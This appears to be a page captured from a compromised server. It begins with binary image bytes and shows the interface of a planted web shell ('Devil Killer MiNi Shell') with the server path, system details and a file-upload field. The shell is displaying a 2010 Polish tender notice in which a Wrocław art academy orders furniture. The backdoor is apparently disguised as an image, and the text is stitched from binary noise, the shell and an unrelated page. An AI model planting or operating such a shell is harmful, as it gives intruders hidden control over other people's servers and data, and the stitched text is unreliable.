JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100511/117215-N-2010.html

<p class="kh_header"><b>Wrocław: Dostawa mebli</b><br>
<b>Numer ogłoszenia: 117215 - 2010; data zamieszczenia: 11.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu , pl. Polski 3/4, 50-156 Wrocław, woj. dolnośląskie, tel. 071 3438031 w. 233, faks 071 3431558.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.asp.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZAKRES ZAMÓWIENIA -DOSTAWA MEBLI (ZP-6-05-2010)
a.	Szczegółowy opis przedmiotu zamówienia znajduje się w formularzu asortymentowo-cenowym - tj. załączniku nr 2 do SIWZ.
b.	Oferty częściowe mogą zostać złożone na każde z zadań wyodrębnionych przez Zamawiającego i oznaczone odpowiednio numerami: zadanie nr 1, zadanie nr 2, zadanie nr 3, zadanie nr 4, zadanie nr 5.
c.	Oferta musi być jednoznaczna i kompleksowa, tj. obejmować cały asortyment przedmiotu zamówienia. Wykonawca musi złożyć ofertę na cały asortyment określony dla danego zadania.
Zadanie nr 1
Dostawa mebli do Ośrodka Plenerowego ASP w Luboradowie (gmina Krośnice)
1	Rama łóżka piętrowego-3szt
2	Rama łóżka jednoosobowego-21szt
3	Stelaż do łóżka (pod materac)-27szt
4	Materac do łóżka-27szt
5	Stolik nocny-22szt
6	Szafa-8szt
7	Krzesło-30szt
8	Stół-8szt
9	Taboret-10szt
10	Sofa trzyosobowa rozkładana-2szt
Zadanie nr 2
Dostawa mebli do domu studenckiego ASP ul. Pobożnego 9 we Wrocławiu
1	Krzesło-27szt
2	Stół-10szt
Zadanie nr 3
Dostawa mebli do budynku ASP pl. Polski 3/4 we Wrocławiu
1	Szafa biurowa-1szt
2	Szafa biurowa-1szt
3	Stół biurowy-1szt
Zadanie nr 4
Dostawa mebli do budynku ASP pl. Polski 3/4 we Wrocławiu
1	SZAFA METALOWA-4szt
Zadanie nr 5
Dostawa mebli do budynku ASP pl. Polski 3/4 we Wrocławiu
1	STOŁY METALOWE-10szt
2	SZAFA BIUROWA METALOWA-5szt
3	REGAŁ METALOWY NR 1-12szt
4	REGAŁ METALOWY NR 2-12szt.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.13.00.00-2, 39.14.31.10-0, 39.14.13.00-5, 39.12.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium. 
Zamawiający ustala kwotę wadium na: 2.000 zł (dwa tysiące złotych 00/100).
Wadium może być wnoszone w następujących formach: 
1.	w pieniądzu, 
2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.	gwarancjach bankowych, 
4.	gwarancjach ubezpieczeniowych,
5.	poręczeniach bankowych lub 
6.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).
Wadium Wykonawca musi wnieść przed upływem terminu składania ofert tj. do 19-05-2010r. do godz. 10:00, na cały okres ważności oferty i nie może zawierać żadnych ograniczeń sprzecznych z ustawą, w szczególności ograniczających możliwość zrealizowania praw określonych w art. 46 ust. 4a i ust. 5 ustawy Pzp.
Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego: 
ING Bank Śląski S.A. o/Wrocław nr  93 1050 1575 1000 0005 0269 6594,
z podaniem nazwy przetargu - wadium na przetarg ZP-6/05/2010: 		
Wniesienie wadium w pieniądzu, w formie przelewu bankowego, Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert  tj do 19-05-2010r.do godz. 10:00.
Wadium wnoszone w innej formie niż pieniądz winno być wystawione na Zamawiającego, mieć formę oświadczenia bezwarunkowego, nieodwołalnego i płatnego na pierwsze pisemne żądanie Zamawiającego. Oryginał dokumentu wadialnego ma być zdeponowany w Kasie ASP we Wrocławiu. Wadium można składać od poniedziałku do piątku w godz. 12:00-14:00 (pok. 111, Ip).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy powinni wykazać, że należycie wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jedną dostawę mebli obejmującą przedmiot zamówienia o łącznej wartości nie mniejszej niż 50 000 zł brutto w ramach jednej umowy.
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/nie spełnia. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy, określony warunek jest spełniony, gdy podmioty składające wspólną ofertę spełniają je łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz oferty (załącznik nr 1 do SIWZ).
2)	Formularz asortymentowo-cenowy (załącznik nr 2 do SIWZ).
3)	Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów, na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
4)	Pełnomocnictwo dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu Wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych.
5)	W przypadku złożenia oferty wspólnej przez kilku Wykonawców należy przedstawić pełnomocnictwo ustanawiające pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu o udzielenie niniejszego zamówienia i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby pełnomocnikiem był jeden z Wykonawców składających ofertę wspólną (Partnerów).Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Partnerów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.asp.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu, 
Pl. Polski 3/4, 50-156 Wrocław, pok. 215a, II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2010 godzina 10:00, miejsce: Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu, 
Pl. Polski 3/4, 50-156 Wrocław, 
sekretariat Kanclerza (pok. 107, I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1
Dostawa mebli do Ośrodka Plenerowego ASP w Luboradowie (gmina Krośnice).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Rama łóżka piętrowego-Konstrukcja z drewna litego (świerk lub sosna). Całość wykończona lakierem bezbarwnym akrylowym. Drabinka mocowana na sztywno, z tego samego materiału co reszta mebla-3szt,
2	Rama łóżka jednoosobowego-Konstrukcja z drewna litego (świerk lub sosna). Całość wykończona lakierem bezbarwnym akrylowym. Wezgłowie wysokie, przeciwległy bok łóżka nie wystający powyżej materaca-21szt,
3	Stelaż do łóżka (pod materac)-Listewki z drewna litego lub klejonego połączone na sztywno-27szt,
4	Materac do łóżka-wkład ze sprężyn bonelowych, z wysokogatunkowego drutu 2,2mm, obłożony jest po stronie pikowanej przekładką tapicerską i pianką poliuretanową T25-25mm, o zwiększonej sprężystości. Po stronie niepikowanej warstwą siatki tapicerskiej i pianki poliuretanowej T25-25mm. Pokrowiec wykonany z materiału obiciowego (64% bawełna, 36% poliester) - pikowany owatą 80g-m2. Wysokość 15 cm-27szt,
5	Stolik nocny-Konstrukcja z litego drewna sosnowego lub świerkowego. Blat z klejonki. Dolna półka również z klejonki lub innych ażurowych elementów drewnianych-22szt,
6	Szafa-Konstrukcja z płyty wiórowej laminowanej. o grubości 18 mm,wieniec górny o gr. 25 mm. Wybarwienie imitujące sosnę lub świerk. Dwie szuflady w dolnej części, prowadnice szuflad metalowe, uchwyty drewniane. Wewnątrz szafy po jednej stronie drążek do wieszania garderoby, po drugiej trzy półki.-8szt,
7	Krzesło-Konstrukcja z litego drewna bukowego, wybarwiona w kolorze jasny dąb. Całość wykończona lakierem bezbarwnym. Siedzisko i oparcie twarde-30szt,
8	Stół-Konstrukcja stołu wykonana z litego drewna bukowego.Blat wykonany z płyty wiórowej o gr.18 mm i wykończony okleiną naturalną, wybarwiony w kolorze jasny dąb. Całość wykończona lakierem bezbarwnym-8szt,
9	Taboret-Konstrukcja z litego drewna bukowego, wybarwiona w kolorze jasny dąb. Całość wykończona lakierem bezbarwnym. Siedzisko nietapicerowane, podobnie oparcie-10,
10	Sofa trzyosobowa rozkładana-Rozmiary po złożeniu Szerokość: 200 cm, Głębokość: 104 cm Wysokość: 91 cm Głębokość siedziska: 71 cm, Wysokość siedziska: 40 cm Szerokość łóżka: 140 cm, Długość łóżka: 200 cm. Rama sofy 3 osobowej rozkładanej: Rama: stal, Epoksydowa/poliestrowa powłoka proszkowa Stopki: tworzywo polipropylenowe Nakładka wykończeniowa: tworzywo polietylenowe Pokrycie sofy 3 osobowej rozkładane: Skład łączny: 100% bawełna Pikowanie: watolina poliestrowa Poduszka bez poszewki: włókna z poliestru Materac: Skład łączny: 79% bawełna, 21% poliester część01: Pianka poliuretanowa 28 kg-m3 Pikowanie: watolina poliestrowa, włóknina polipropylenowa Kolor pokrycia ciemnoszary-2szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.13.00.00-2, 39.14.31.10-0, 39.11.00.00-6, 39.14.13.00-5, 39.12.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2
Dostawa mebli do domu studenckiego ASP ul. Pobożnego 9 we Wrocławiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Krzesło ze sklejki bukowej, stelaż (stal nierdz. lub chrom). charakterystyka: stelaż metalowy wykonany z rurki o 20x2,0mm, chromowany końcówki rurek zakończone stopkami plastikowymi. siedzisko i oparcie tworzą jedną całość jako kubełek wykonany z giętej sklejki bukowej. wygodne dzięki ergonomicznemu. kształtowi wypraski. kubełek podwójnie lakierowany, przykręcony za pomocą 4 śrub do stelaża. krzesło ma posiadać otwory w oparciu, krzesło powinno posiadać atest wytrzymałości. Wymiary: wysokość 870 mm, szerokość 550 mm, głębokość 570 mm, wysokość siedziska 470 mm, szerokość siedziska 445 mm, głębokość siedziska 400 mm, wysokość podłokietnika 670 mm, profil nogi przedniej o 20 mm,profil nogi tylnej o 20 mm-27szt,
2	Stół-	blat stołu wykonany z werzalitu, w kolorze antracyt W.074, grubość blatu na obrzeżach 34mm. Podstawa stołu złożona z 4 chromowych nóg, połączona wspornikami stalowymi w układzie krzyża-10szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.11.00.00-6, 39.12.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3
Dostawa mebli do budynku ASP pl. Polski 3/4 we Wrocławiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Szafa biurowa iurowa zamykana na zamek z półkami na dokumenty (segregatory). Szafa powinna być wykonana z płyty o grubości 18 mm, na cokole o wysokości 8 cm. Tyla ściana powinna być wykonana z płyty HDF o grubości 3mm i fabrycznie klejona. Reszta konstrukcji i drzwi z płyty o grubości 18mm. Szafa musi być podzielona wewnątrz na dwie części Szafa powinna mieć wysokiej jakości zawiasy meblowe, charakteryzujące się możliwością otwarcia drzwi do 175 stopni, co zapewni idealne ustawienie drzwi we wszystkich płaszczyznach. Kolor jasny np. olcha, buk-1szt,
2	Szafa biurowa dzielona z drążkiem z prawej  strony i półkami po lewej stronie. (odwrotnie niż na rysunku poglądowym). Zamykana na klucz Kolor: skrzynia wiśnia, przody olcha-1szt,
3	Stół biurowy-Nogi metalowe, przekrój okrągłe. Wzmocnione listwą metalową pod blatem. Kolor blatu szary-1szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.13.00.00-2, 39.12.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4
Dostawa mebli do budynku ASP pl. Polski 3/4 we Wrocławiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SZAFA METALOWA














Szafa metalowa-Szafa dwudrzwiowa o podwyższonej odporności ogniowej i skutecznej ochronie antywłamaniowej. Szafa o podwyższonej odporności ogniowej przeznaczone są do przechowywania akt, dokumentów i innych wartościowych przedmiotów i chroni je w przypadku pożaru i włamania. Konstrukcję szafy stanowi podwójny płaszcz stalowy ze specjalnym wypełnieniem zwiększającym odporność na podwyższoną temperaturę. W drzwiach może być zamontowany atestowany zamek kluczowy, szyfrowy lub elektroniczny. Wszystkie zamki są wyposażone w mechanizmy zabezpieczające przed wybiciem i przewierceniem. Specjalne wykonanie wnętrza umożliwia dowolne ustawienie półek. Grubość pancerza szafy wynosi 60 mm, zaś grubość drzwi 66 mm. Kąt otwarcia drzwi to 180°. Szafy zabezpieczone są antykorozyjnie oraz lakierowane estetycznym, ekologicznym, proszkowym lakierem strukturalnym o barwie jasnoszarej (RAL 9002) lub czarnej (RAL 9005). Szafy wykorzystane będą w pracowniach dyplomujących do przechowywania sprzętu komputerowego rzutników, aparatów fotograficznych.Opis produktu: Szafa dwudrzwiowa o podwyższonej odporności ogniowej i skutecznej ochronie antywłamaniowej. Wielowarstwowa konstrukcja stalowa wypełniona specjalnym kompozytem. Wyposażona w atestowany zamek: kluczowy Możliwość montażu dwóch dowolnych zamków. W standardzie cztery półki z regulacją wysokości zawieszenia. Wyposażona w uchwyty do plombowania.Przystosowane do mocowania do podłoża-4szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.13.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5
Dostawa mebli do budynku ASP pl. Polski 3/4 we Wrocławiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	STOŁY METALOWE-Stół mobilny wymiary blatu: 150 x 74,5 x 3
wysokość stołu  86 z kołami, koła dwa stałe ,dwa skrętne z hamulcem-10szt,
2	SZAFA BIUROWA METALOWA	SZAFA NA DOKUMENTY , SEGREGATORY  ZAMYKANA NA ZAMEK KASETOWY Z TRZYPUNKTOWYM  RYGLOWANIEM  REGULACJA PÓŁEK CO 40 mm  Kolor do uzgodnienia-5szt,
3	REGAŁ METALOWY NR 1-	REGAŁ METALOWY- PÓŁKI O GŁĘBOKOŚCI OD 400 DO 1000 mm - KONSTRUKCJA ZACZEPOWA - PÓŁKI Z BLACHY OCYNKOWANEJ 
- WZMOCNIENIE POPRZECZNE I WZDŁUŻNE- MOCOWANIE PÓŁEK CO 25 mm - NOŚNOŚĆ PÓŁEK 100 kg - STĘŻENIE ZWIĘKSZAJĄCE STATECZNOŚĆ REGAŁU, 
- WZMOCNIENIE BOCZNE-12szt,
